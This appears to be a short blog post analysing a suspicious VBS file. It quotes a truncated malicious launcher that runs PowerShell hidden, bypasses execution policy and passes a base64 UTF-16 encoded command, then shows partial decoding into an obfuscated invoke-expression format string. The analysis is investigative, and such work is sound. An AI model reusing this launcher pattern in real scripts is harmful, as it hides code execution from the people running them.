2018-03-05
Obfuscating powershell with -encoded and UTF-16
In some files I noticed a vbs file where I expected something else. Vbs sounds like visual basic script so I directly started looking for malware. And indeed I saw suspicous code, with a for me new type of obfuscation. The vbs has one really long line, beginning with:CreateObject("Wscript.Shell").Run("powershell -w hidden -ep bypass -enc aQBuAHYA bwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACgAIgB7ADQAOAB9AHsAMQAyAH0AewAyADgAfQB7ADEA MAAzAH0AewAyADEAfQB7ADkAfQB7ADEAMAA2AH0AewA3ADAAfQB7ADIAOAB9AHsAOAB9AHsAMAB9AHsAand at the end:IgByACIALAAiAGsAIgAsACIAYQAiACwAIgAgACIALAAiAHYAIgAsACIAZwAiACwAIgBzACIALAAiAGUA IgAsACIAbgAiACwAIgArACIALAAiAHQAIgAsACIAcgAiACwAIgAiACwAIgB0ACIALAAiAHAAIgAsACIA ZQAiACwAIgBlACIALAAiAC8AIgAsACIAZQAiACwAIgBTACIAKQA=")Which looked very base64-like to me. But standard tools could not find out what it was:$ base64 -d < base64part | file - /dev/stdin: dataBut with a second look I could make out something:$ base64 -d < base64part | xxd | less 0000000: 6900 6e00 7600 6f00 6b00 6500 2d00 6500 i.n.v.o.k.e.-.e. 0000010: 7800 7000 7200 6500 7300 7300 6900 6f00 x.p.r.e.s.s.i.o. 0000020: 6e00 2800 2200 7b00 3400 3800 7d00 7b00 n.(.".{.4.8.}.{. 0000030: 3100 3200 7d00 7b00 3200 3800 7d00 7b00 1.2.}.{.2.8.}.{. 0000040: 3100 3000 3300 7d00 7b00 3200 3100 7d00 1.0.3.}.{.2.1.}. 0000050: 7b00 3900 7d00 7b00 3100 3000 3600 7d00 {.9.}.{.1.0.6.}. 0000060: 7b00 3700 3000 7d00 7b00 3200 3800 7d00 {.7.0.}.{.2.8.}. 0000070: 7b00 3800 7d00 7b00 3000 7d00 7b00 3200 {.8.}.{.0.}.{.2. 0000080: 7d00 7b00 3400 3100 7d00 7b00 3100 3100 }.{.4.1.}.{.1.1. 0000090: 3300 7d00 7b00 3600 3600 7d00 7b00 3000 3.}.{.6.6.}.{.0.Suddenly there is UTF-16 powershell code. Or when I simply cat it to a terminal:invoke-expression("{48}{12}{28}{103}{21}{9}{106}{70}{28}{8}{0}{2}{41}{113}{66} [..] -f "t","2"," ",".","i","f","C","'","c","o","2",")","n","n","0","c","'","/",It looks like some kind of array mapping, but I have no idea how to decode this into readable code to check what it does. I am quite sure it can't be up to any good if I keep finding levels of obfuscation!